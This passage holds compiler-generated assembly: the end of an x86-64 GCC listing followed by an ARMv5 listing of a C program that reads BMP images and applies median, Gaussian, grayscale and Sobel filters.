eax and eax, 3 cmp DWORD PTR -92[rbp], eax jb .L201 add DWORD PTR -104[rbp], 1 .L194: mov eax, DWORD PTR -132[rbp] cmp DWORD PTR -104[rbp], eax jb .L202 mov rax, QWORD PTR -72[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -64[rbp] test rax, rax jne .L203 mov rax, QWORD PTR -64[rbp] mov rdi, rax call free@PLT .L203: mov rax, QWORD PTR -80[rbp] mov rdi, rax call fclose@PLT jmp .L207 .L185: mov rax, QWORD PTR -160[rbp] add rax, 8 mov rax, QWORD PTR [rax] mov rsi, rax lea rdi, .LC47[rip] mov eax, 0 call printf@PLT jmp .L207 .L209: nop jmp .L207 .L210: nop jmp .L207 .L211: nop jmp .L207 .L212: nop jmp .L207 .L215: nop jmp .L207 .L216: nop jmp .L207 .L217: nop .L205: jmp .L207 .L206: mov rbx, QWORD PTR -24[rbp] sub rbx, QWORD PTR fs:40 je .L208 call __stack_chk_fail@PLT .L208: mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE17: .size main, .-main .section .rodata .align 8 .LC3: .long 0 .long 1073741824 .align 16 .LC4: .long 0 .long -2147483648 .long 0 .long 0 .align 8 .LC5: .long 1413754136 .long 1075388923 .align 8 .LC6: .long -446676599 .long 1070801616 .align 8 .LC7: .long 962072674 .long 1071827124 .align 8 .LC8: .long -1614907703 .long 1069362970 .align 8 .LC9: .long 0 .long 1072693248 .align 8 .LC10: .long 0 .long -1074790400 .align 8 .LC11: .long 0 .long -1073741824 .align 16 .LC12: .long -1 .long 2147483647 .long 0 .long 0 .align 8 .LC13: .long 0 .long 1081073664 .align 8 .LC14: .long 858993459 .long 1071854387 .align 8 .LC15: .long 0 .long 1080025088 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "722312.c" .text .section .rodata .align 2 .LC3: .ascii "%c\000" .text .align 2 .global fprint_bit_unsigned_int .syntax unified .arm .fpu softvfp .type fprint_bit_unsigned_int, %function fprint_bit_unsigned_int: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #0 str r3, [fp, #-8] b .L2 .L3: mov r2, #255 ldr r3, [fp, #-8] lsl r3, r2, r3 mov r2, r3 ldr r3, [fp, #-20] and r2, r2, r3 ldr r3, [fp, #-8] lsr r3, r2, r3 mov r2, r3 ldr r1, .L4 ldr r0, [fp, #-16] bl fprintf ldr r0, [fp, #-16] bl fflush ldr r3, [fp, #-8] add r3, r3, #8 str r3, [fp, #-8] .L2: ldr r3, [fp, #-8] cmp r3, #24 ble .L3 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L5: .align 2 .L4: .word .LC3 .size fprint_bit_unsigned_int, .-fprint_bit_unsigned_int .align 2 .global fprint_bit_unsigned_short .syntax unified .arm .fpu softvfp .type fprint_bit_unsigned_short, %function fprint_bit_unsigned_short: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] mov r3, r1 strh r3, [fp, #-10] @ movhi ldrh r3, [fp, #-10] and r3, r3, #255 ldr r1, [fp, #-8] mov r0, r3 bl fputc ldr r0, [fp, #-8] bl fflush ldrh r3, [fp, #-10] lsr r3, r3, #8 lsl r3, r3, #16 lsr r3, r3, #16 ldr r1, [fp, #-8] mov r0, r3 bl fputc ldr r0, [fp, #-8] bl fflush nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size fprint_bit_unsigned_short, .-fprint_bit_unsigned_short .align 2 .global skip_and_write .syntax unified .arm .fpu softvfp .type skip_and_write, %function skip_and_write: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-16] str r1, [fp, #-20] str r2, [fp, #-24] mov r3, #0 str r3, [fp, #-8] b .L8 .L9: ldr r0, [fp, #-16] bl fgetc mov r3, r0 ldr r1, [fp, #-20] mov r0, r3 bl fputc ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L8: ldr r2, [fp, #-8] ldr r3, [fp, #-24] cmp r2, r3 bcc .L9 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size skip_and_write, .-skip_and_write .section .rodata .align 2 .LC4: .word __stack_chk_guard .text .align 2 .global fget_int .syntax unified .arm .fpu softvfp .type fget_int, %function fget_int: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] ldr r3, .L15 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #0 str r3, [fp, #-16] b .L11 .L12: ldr r0, [fp, #-24] bl fgetc mov r3, r0 and r1, r3, #255 sub r2, fp, #12 ldr r3, [fp, #-16] add r3, r2, r3 mov r2, r1 strb r2, [r3] ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L11: ldr r3, [fp, #-16] cmp r3, #3 ble .L12 sub r3, fp, #12 ldr r3, [r3] ldr r2, .L15 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L14 bl __stack_chk_fail .L14: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L16: .align 2 .L15: .word .LC4 .size fget_int, .-fget_int .section .rodata .align 2 .LC5: .ascii "BM\000" .text .align 2 .global read_and_write_bmp .syntax unified .arm .fpu softvfp .type read_and_write_bmp, %function read_and_write_bmp: @ args = 8, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #40 str r0, [fp, #-32] str r1, [fp, #-36] str r2, [fp, #-40] str r3, [fp, #-44] ldr r0, [fp, #-32] bl fgetc mov r3, r0 cmp r3, #66 beq .L18 ldr r0, [fp, #-32] bl fclose ldr r0, [fp, #-36] bl fclose mov r3, #1 b .L19 .L18: ldr r0, [fp, #-32] bl fgetc mov r3, r0 cmp r3, #77 beq .L20 ldr r0, [fp, #-32] bl fclose ldr r0, [fp, #-36] bl fclose mov r3, #1 b .L19 .L20: ldr r3, [fp, #-36] mov r2, #2 mov r1, #1 ldr r0, .L32 bl fwrite mov r2, #8 ldr r1, [fp, #-36] ldr r0, [fp, #-32] bl skip_and_write ldr r0, [fp, #-32] bl fget_int str r0, [fp, #-8] ldr r1, [fp, #-8] ldr r0, [fp, #-36] bl fprint_bit_unsigned_int mov r2, #4 ldr r1, [fp, #-36] ldr r0, [fp, #-32] bl skip_and_write ldr r0, [fp, #-32] bl fget_int mov r2, r0 ldr r3, [fp, #-40] str r2, [r3] ldr r3, [fp, #-40] ldr r3, [r3] mov r1, r3 ldr r0, [fp, #-36] bl fprint_bit_unsigned_int ldr r0, [fp, #-32] bl fget_int mov r2, r0 ldr r3, [fp, #-44] str r2, [r3] ldr r3, [fp, #-44] ldr r3, [r3] mov r1, r3 ldr r0, [fp, #-36] bl fprint_bit_unsigned_int mov r2, #2 ldr r1, [fp, #-36] ldr r0, [fp, #-32] bl skip_and_write ldr r0, [fp, #-32] bl fgetc mov r3, r0 strh r3, [fp, #-26] @ movhi ldr r0, [fp, #-32] bl fgetc mov r3, r0 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #8 lsl r3, r3, #16 asr r2, r3, #16 ldrsh r3, [fp, #-26] orr r3, r2, r3 lsl r3, r3, #16 asr r3, r3, #16 strh r3, [fp, #-26] @ movhi ldrh r3, [fp, #-26] mov r1, r3 ldr r0, [fp, #-36] bl fprint_bit_unsigned_short ldr r3, [fp, #-8] sub r3, r3, #30 mov r2, r3 ldr r1, [fp, #-36] ldr r0, [fp, #-32] bl skip_and_write ldrh r3, [fp, #-26] cmp r3, #32 bne .L21 ldr r3, [fp, #-40] ldr r3, [r3] ldr r2, [fp, #-44] ldr r2, [r2] mul r3, r2, r3 mov r0, r3 bl malloc mov r3, r0 mov r2, r3 ldr r3, [fp, #8] str r2, [r3] b .L22 .L21: ldr r3, [fp, #8] mov r2, #0 str r2, [r3] .L22: ldr r3, [fp, #-40] ldr r3, [r3] ldr r2, [fp, #-44] ldr r2, [r2] mul r2, r3, r2 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 mov r0, r3 bl malloc mov r3, r0 mov r2, r3 ldr r3, [fp, #4] str r2, [r3] mov r3, #0 str r3, [fp, #-24] b .L23 .L31: mov r3, #0 str r3, [fp, #-20] b .L24 .L28: mov r3, #2 str r3, [fp, #-16] b .L25 .L26: ldr r0, [fp, #-32] bl fgetc ldr r3, [fp, #4] ldr r1, [r3] ldr r3, [fp, #-40] ldr r3, [r3] ldr r2, [fp, #-24] mul r2, r3, r2 ldr r3, [fp, #-20] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r2, r1, r3 ldr r3, [fp, #-16] add r3, r2, r3 and r2, r0, #255 strb r2, [r3] ldr r3, [fp, #-16] sub r3, r3, #1 str r3, [fp, #-16] .L25: ldr r3, [fp, #-16] cmp r3, #0 bge .L26 ldrh r3, [fp, #-26] cmp r3, #32 bne .L27 ldr r0, [fp, #-32] bl fgetc mov r1, r0 ldr r3, [fp, #-40] ldr r3, [r3] ldr r2, [fp, #-24] mul r2, r3, r2 ldr r3, [fp, #-20] add r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #8] add r3, r2, r3 ldr r3, [r3] and r2, r1, #255 strb r2, [r3] .L27: ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L24: ldr r3, [fp, #-40] ldr r3, [r3] ldr r2, [fp, #-20] cmp r2, r3 bcc .L28 mov r3, #0 str r3, [fp, #-12] b .L29 .L30: ldr r0, [fp, #-32] bl fgetc ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L29: ldr r3, [fp, #-40] ldr r3, [r3] ldrh r2, [fp, #-26] lsr r2, r2, #3 lsl r2, r2, #16 lsr r2, r2, #16 mul r3, r2, r3 rsb r3, r3, #0 and r3, r3, #3 ldr r2, [fp, #-12] cmp r2, r3 bcc .L30 ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L23: ldr r3, [fp, #-44] ldr r3, [r3] ldr r2, [fp, #-24] cmp r2, r3 bcc .L31 ldr r0, [fp, #-32] bl fclose mov r3, #0 .L19: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L33: .align 2 .L32: .word .LC5 .size read_and_write_bmp, .-read_and_write_bmp .global __aeabi_ui2d .global __aeabi_dmul .global __aeabi_dadd .global __aeabi_dsub .global __aeabi_ddiv .align 2 .global use_mask .syntax unified .arm .fpu softvfp .type use_mask, %function use_mask: @ args = 24, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #40 str r0, [fp, #-32] str r1, [fp, #-36] str r2, [fp, #-40] str r3, [fp, #-44] ldr r3, [fp, #16] lsr r3, r3, #1 str r3, [fp, #-16] mov r2, #0 mov r3, #0 str r2, [fp, #-12] str r3, [fp, #-8] ldr r3, [fp, #-16] rsb r3, r3, #0 str r3, [fp, #-24] b .L35 .L40: ldr r3, [fp, #-16] rsb r3, r3, #0 str r3, [fp, #-20] b .L36 .L39: ldr r2, [fp, #-24] ldr r3, [fp, #4] add r3, r2, r3 ldr r2, [fp, #-40] cmp r2, r3 bls .L37 ldr r2, [fp, #-20] ldr r3, [fp, #-44] add r3, r2, r3 ldr r2, [fp, #-36] cmp r2, r3 bls .L37 ldr r3, [fp, #-32] ldr r1, [r3] ldr r2, [fp, #-24] ldr r3, [fp, #4] add r3, r2, r3 ldr r2, [fp, #-36] mul r2, r3, r2 ldr r3, [fp, #-44] add r2, r2, r3 ldr r3, [fp, #-20] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r2, r1, r3 ldr r3, [fp, #8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r0, r3 bl __aeabi_ui2d ldr r2, [fp, #-24] ldr r3, [fp, #-16] add r3, r2, r3 mov r2, r3 ldr r3, [fp, #16] mul r2, r3, r2 ldr r3, [fp, #-20] add r2, r2, r3 ldr r3, [fp, #-16] add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #12] add r3, r2, r3 ldmia r3, {r2-r3} bl __aeabi_dmul mov r2, r0 mov r3, r1 sub r1, fp, #12 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-12] str r3, [fp, #-8] b .L38 .L37: ldr r2, [fp, #-24] ldr r3, [fp, #-16] add r3, r2, r3 mov r2, r3 ldr r3, [fp, #16] mul r2, r3, r2 ldr r3, [fp, #-20] add r2, r2, r3 ldr r3, [fp, #-16] add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #12] add r3, r2, r3 ldmia r3, {r2-r3} add r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #20] str r3, [fp, #24] .L38: ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L36: ldr r2, [fp, #-20] ldr r3, [fp, #-16] cmp r2, r3 ble .L39 ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L35: ldr r2, [fp, #-24] ldr r3, [fp, #-16] cmp r2, r3 ble .L40 add r3, fp, #20 ldmia r3, {r2-r3} sub r1, fp, #12 ldmia r1, {r0-r1} bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size use_mask, .-use_mask .global __aeabi_i2d .global __aeabi_d2uiz .align 2 .global megas .syntax unified .arm .fpu softvfp .type megas, %function megas: @ args = 16, pretend = 0, frame = 96 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, fp, lr} add fp, sp, #24 sub sp, sp, #124 str r1, [fp, #-116] str r2, [fp, #-120] str r3, [fp, #-124] mov r3, r0 strb r3, [fp, #-109] mov r3, #0 str r3, [fp, #-104] mov r3, #0 str r3, [fp, #-100] ldrb r3, [fp, #-109] @ zero_extendqisi2 cmp r3, #103 beq .L43 cmp r3, #109 bne .L77 ldr r3, [fp, #4] ldr r2, [fp, #4] mul r3, r2, r3 mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-104] b .L45 .L43: ldr r3, [fp, #4] ldr r2, [fp, #4] mul r3, r2, r3 lsl r3, r3, #3 mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-100] nop .L45: ldr r3, [fp, #4] lsr r2, r3, #31 add r3, r2, r3 asr r3, r3, #1 str r3, [fp, #-44] mov r2, #0 mov r3, #0 str r2, [fp, #-36] str r3, [fp, #-32] ldr r3, [fp, #-124] ldr r2, [fp, #-120] mul r2, r3, r2 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-40] ldrb r3, [fp, #-109] @ zero_extendqisi2 cmp r3, #103 bne .L47 ldr r3, [fp, #-44] rsb r3, r3, #0 str r3, [fp, #-92] b .L48 .L51: ldr r3, [fp, #-44] rsb r3, r3, #0 str r3, [fp, #-88] b .L49 .L50: ldr r0, [fp, #-92] bl __aeabi_i2d mov r2, #0 mov r3, #1073741824 bl pow mov r6, r0 mov r7, r1 ldr r0, [fp, #-88] bl __aeabi_i2d mov r2, #0 mov r3, #1073741824 bl pow mov r2, r0 mov r3, r1 mov r0, r6 mov r1, r7 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r4, r2 eor r5, r3, #-2147483648 mov r2, #0 mov r3, #1073741824 add r1, fp, #12 ldmia r1, {r0-r1} bl pow mov r2, r0 mov r3, r1 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl exp mov r6, r0 mov r7, r1 mov r2, #0 mov r3, #1073741824 add r1, fp, #12 ldmia r1, {r0-r1} bl pow ldr r2, .L78 ldr r3, .L78+4 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 ldr r2, [fp, #-92] ldr r3, [fp, #-44] add r3, r2, r3 ldr r2, [fp, #4] mul r2, r3, r2 ldr r3, [fp, #-88] add r2, r2, r3 ldr r3, [fp, #-44] add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #-100] add r8, r2, r3 mov r2, r0 mov r3, r1 mov r0, r6 mov r1, r7 bl __aeabi_ddiv mov r2, r0 mov r3, r1 stm r8, {r2-r3} ldr r2, [fp, #-92] ldr r3, [fp, #-44] add r3, r2, r3 ldr r2, [fp, #4] mul r2, r3, r2 ldr r3, [fp, #-88] add r2, r2, r3 ldr r3, [fp, #-44] add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #-100] add r3, r2, r3 ldmia r3, {r2-r3} sub r1, fp, #36 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-36] str r3, [fp, #-32] ldr r3, [fp, #-88] add r3, r3, #1 str r3, [fp, #-88] .L49: ldr r2, [fp, #-88] ldr r3, [fp, #-44] cmp r2, r3 ble .L50 ldr r3, [fp, #-92] add r3, r3, #1 str r3, [fp, #-92] .L48: ldr r2, [fp, #-92] ldr r3, [fp, #-44] cmp r2, r3 ble .L51 .L47: mov r3, #0 str r3, [fp, #-84] b .L52 .L69: mov r3, #0 str r3, [fp, #-80] b .L53 .L68: mov r3, #0 str r3, [fp, #-76] b .L54 .L67: ldrb r3, [fp, #-109] @ zero_extendqisi2 cmp r3, #103 beq .L55 cmp r3, #109 bne .L56 mov r3, #0 str r3, [fp, #-96] ldr r3, [fp, #-44] rsb r3, r3, #0 str r3, [fp, #-72] b .L57 .L61: ldr r3, [fp, #-44] rsb r3, r3, #0 str r3, [fp, #-68] b .L58 .L60: ldr r2, [fp, #-84] ldr r3, [fp, #-72] add r3, r2, r3 cmp r3, #0 blt .L59 ldr r2, [fp, #-84] ldr r3, [fp, #-72] add r3, r2, r3 mov r2, r3 ldr r3, [fp, #-124] cmp r3, r2 bls .L59 ldr r2, [fp, #-80] ldr r3, [fp, #-68] add r3, r2, r3 cmp r3, #0 blt .L59 ldr r2, [fp, #-80] ldr r3, [fp, #-68] add r3, r2, r3 mov r2, r3 ldr r3, [fp, #-120] cmp r3, r2 bls .L59 ldr r3, [fp, #-96] add r3, r3, #1 str r3, [fp, #-96] ldr r3, [fp, #-116] ldr r1, [r3] ldr r2, [fp, #-84] ldr r3, [fp, #-72] add r3, r2, r3 mov r2, r3 ldr r3, [fp, #-120] mul r2, r3, r2 ldr r3, [fp, #-80] add r2, r2, r3 ldr r3, [fp, #-68] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r2, r1, r3 ldr r3, [fp, #-76] add r2, r2, r3 ldr r3, [fp, #-96] sub r3, r3, #1 ldr r1, [fp, #-104] add r3, r1, r3 ldrb r2, [r2] @ zero_extendqisi2 strb r2, [r3] .L59: ldr r3, [fp, #-68] add r3, r3, #1 str r3, [fp, #-68] .L58: ldr r2, [fp, #-68] ldr r3, [fp, #-44] cmp r2, r3 ble .L60 ldr r3, [fp, #-72] add r3, r3, #1 str r3, [fp, #-72] .L57: ldr r2, [fp, #-72] ldr r3, [fp, #-44] cmp r2, r3 ble .L61 mov r3, #0 str r3, [fp, #-64] b .L62 .L66: ldr r2, [fp, #-104] ldr r3, [fp, #-64] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-107] ldr r3, [fp, #-64] strh r3, [fp, #-106] @ movhi ldr r3, [fp, #-64] str r3, [fp, #-60] b .L63 .L65: ldr r3, [fp, #-60] ldr r2, [fp, #-104] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 ldrb r2, [fp, #-107] @ zero_extendqisi2 cmp r2, r3 bls .L64 ldr r3, [fp, #-60] ldr r2, [fp, #-104] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-107] ldr r3, [fp, #-60] strh r3, [fp, #-106] @ movhi .L64: ldr r3, [fp, #-60] add r3, r3, #1 str r3, [fp, #-60] .L63: ldr r2, [fp, #-60] ldr r3, [fp, #-96] cmp r2, r3 blt .L65 ldr r2, [fp, #-104] ldr r3, [fp, #-64] add r2, r2, r3 ldrsh r3, [fp, #-106] ldr r1, [fp, #-104] add r3, r1, r3 ldrb r2, [r2] @ zero_extendqisi2 strb r2, [r3] ldr r2, [fp, #-104] ldr r3, [fp, #-64] add r3, r2, r3 ldrb r2, [fp, #-107] strb r2, [r3] ldr r3, [fp, #-64] add r3, r3, #1 str r3, [fp, #-64] .L62: ldr r3, [fp, #-96] ldr r2, [fp, #-64] cmp r2, r3 bcc .L66 ldr r3, [fp, #-96] lsr r2, r3, #31 add r3, r2, r3 asr r3, r3, #1 mov r2, r3 ldr r3, [fp, #-104] add r1, r3, r2 ldr r3, [fp, #-84] ldr r2, [fp, #-120] mul r2, r3, r2 ldr r3, [fp, #-80] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-40] add r2, r2, r3 ldrb r1, [r1] @ zero_extendqisi2 ldr r3, [fp, #-76] add r3, r2, r3 mov r2, r1 strb r2, [r3] b .L56 .L55: ldr ip, [fp, #-80] ldr r1, [fp, #-84] ldr r0, [fp, #4] sub r3, fp, #36 ldmia r3, {r2-r3} str r2, [sp, #16] str r3, [sp, #20] str r0, [sp, #12] ldr r3, [fp, #-100] str r3, [sp, #8] ldr r3, [fp, #-76] str r3, [sp, #4] str r1, [sp] mov r3, ip ldr r2, [fp, #-124] ldr r1, [fp, #-120] ldr r0, [fp, #-116] bl use_mask ldr r3, [fp, #-84] ldr r2, [fp, #-120] mul r2, r3, r2 ldr r3, [fp, #-80] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-40] add r4, r2, r3 bl __aeabi_d2uiz mov r3, r0 and r2, r3, #255 ldr r3, [fp, #-76] add r3, r4, r3 strb r2, [r3] nop .L56: ldr r3, [fp, #-76] add r3, r3, #1 str r3, [fp, #-76] .L54: ldr r3, [fp, #-76] cmp r3, #2 ble .L67 ldr r3, [fp, #-80] add r3, r3, #1 str r3, [fp, #-80] .L53: ldr r3, [fp, #-80] ldr r2, [fp, #-120] cmp r2, r3 bhi .L68 ldr r3, [fp, #-84] add r3, r3, #1 str r3, [fp, #-84] .L52: ldr r3, [fp, #-84] ldr r2, [fp, #-124] cmp r2, r3 bhi .L69 mov r3, #0 str r3, [fp, #-56] b .L70 .L75: mov r3, #0 str r3, [fp, #-52] b .L71 .L74: mov r3, #0 str r3, [fp, #-48] b .L72 .L73: ldr r3, [fp, #-56] ldr r2, [fp, #-120] mul r2, r3, r2 ldr r3, [fp, #-52] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-40] add r1, r2, r3 ldr r3, [fp, #-116] ldr r0, [r3] ldr r3, [fp, #-56] ldr r2, [fp, #-120] mul r2, r3, r2 ldr r3, [fp, #-52] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r2, r0, r3 ldr r3, [fp, #-48] add r3, r2, r3 ldr r2, [fp, #-48] add r2, r1, r2 ldrb r2, [r2] @ zero_extendqisi2 strb r2, [r3] ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L72: ldr r3, [fp, #-48] cmp r3, #2 ble .L73 ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L71: ldr r2, [fp, #-52] ldr r3, [fp, #-120] cmp r2, r3 bcc .L74 ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L70: ldr r2, [fp, #-56] ldr r3, [fp, #-124] cmp r2, r3 bcc .L75 ldr r0, [fp, #-40] bl free ldrb r3, [fp, #-109] @ zero_extendqisi2 cmp r3, #103 beq .L76 cmp r3, #109 bne .L42 ldr r0, [fp, #-104] bl free b .L42 .L76: ldr r0, [fp, #-100] bl free b .L42 .L77: nop .L42: sub sp, fp, #24 @ sp needed pop {r4, r5, r6, r7, r8, fp, pc} .L79: .align 2 .L78: .word 1413754136 .word 1075388923 .size megas, .-megas .align 2 .global shade .syntax unified .arm .fpu softvfp .type shade, %function shade: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #40 str r0, [fp, #-40] str r1, [fp, #-44] str r2, [fp, #-48] mov r3, #0 str r3, [fp, #-32] b .L81 .L86: mov r3, #0 str r3, [fp, #-28] b .L82 .L85: ldr r3, [fp, #-40] ldr r1, [r3] ldr r3, [fp, #-32] ldr r2, [fp, #-44] mul r2, r3, r2 ldr r3, [fp, #-28] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r3, r1, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r0, r3 bl __aeabi_i2d ldr r2, .L87 ldr r3, .L87+4 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r4, r2 mov r5, r3 ldr r3, [fp, #-40] ldr r1, [r3] ldr r3, [fp, #-32] ldr r2, [fp, #-44] mul r2, r3, r2 ldr r3, [fp, #-28] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r3, r1, r3 add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 mov r0, r3 bl __aeabi_i2d ldr r2, .L87+8 ldr r3, .L87+12 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r4, r2 mov r5, r3 ldr r3, [fp, #-40] ldr r1, [r3] ldr r3, [fp, #-32] ldr r2, [fp, #-44] mul r2, r3, r2 ldr r3, [fp, #-28] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r3, r1, r3 add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 mov r0, r3 bl __aeabi_i2d ldr r2, .L87+16 ldr r3, .L87+20 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] mov r3, #0 str r3, [fp, #-24] b .L83 .L84: ldr r3, [fp, #-40] ldr r1, [r3] ldr r3, [fp, #-32] ldr r2, [fp, #-44] mul r2, r3, r2 ldr r3, [fp, #-28] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r2, r1, r3 ldr r3, [fp, #-24] add r4, r2, r3 sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_d2uiz mov r3, r0 and r3, r3, #255 strb r3, [r4] ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L83: ldr r3, [fp, #-24] cmp r3, #2 ble .L84 ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L82: ldr r2, [fp, #-28] ldr r3, [fp, #-44] cmp r2, r3 bcc .L85 ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] .L81: ldr r2, [fp, #-32] ldr r3, [fp, #-48] cmp r2, r3 bcc .L86 nop nop sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L88: .align 2 .L87: .word -446676599 .word 1070801616 .word 962072674 .word 1071827124 .word -1614907703 .word 1069362970 .size shade, .-shade .global __aeabi_dcmpgt .section .rodata .align 3 .LC0: .word 0 .word 1072693248 .word 0 .word 1073741824 .word 0 .word 1072693248 .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word 0 .word -1074790400 .word 0 .word -1073741824 .word 0 .word -1074790400 .align 3 .LC1: .word 0 .word -1074790400 .word 0 .word 0 .word 0 .word 1072693248 .word 0 .word -1073741824 .word 0 .word 0 .word 0 .word 1073741824 .word 0 .word -1074790400 .word 0 .word 0 .word 0 .word 1072693248 .align 3 .LC2: .word 3848290697 .word 1070801616 .word 962072674 .word 1071827124 .word 2680059593 .word 1069362970 .align 2 .LC6: .word __stack_chk_guard .text .align 2 .global sobel_xy .syntax unified .arm .fpu softvfp .type sobel_xy, %function sobel_xy: @ args = 8, pretend = 0, frame = 248 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #272 str r1, [fp, #-252] str r2, [fp, #-256] str r3, [fp, #-260] mov r3, r0 strb r3, [fp, #-245] ldr r3, .L115 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r3, [fp, #-260] ldr r2, [fp, #-256] mul r2, r3, r2 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-216] ldr r2, .L115+4 sub r3, fp, #164 mov r1, r2 mov r2, #72 mov r0, r3 bl memcpy ldr r2, .L115+8 sub r3, fp, #92 mov r1, r2 mov r2, #72 mov r0, r3 bl memcpy ldr r3, .L115+12 sub ip, fp, 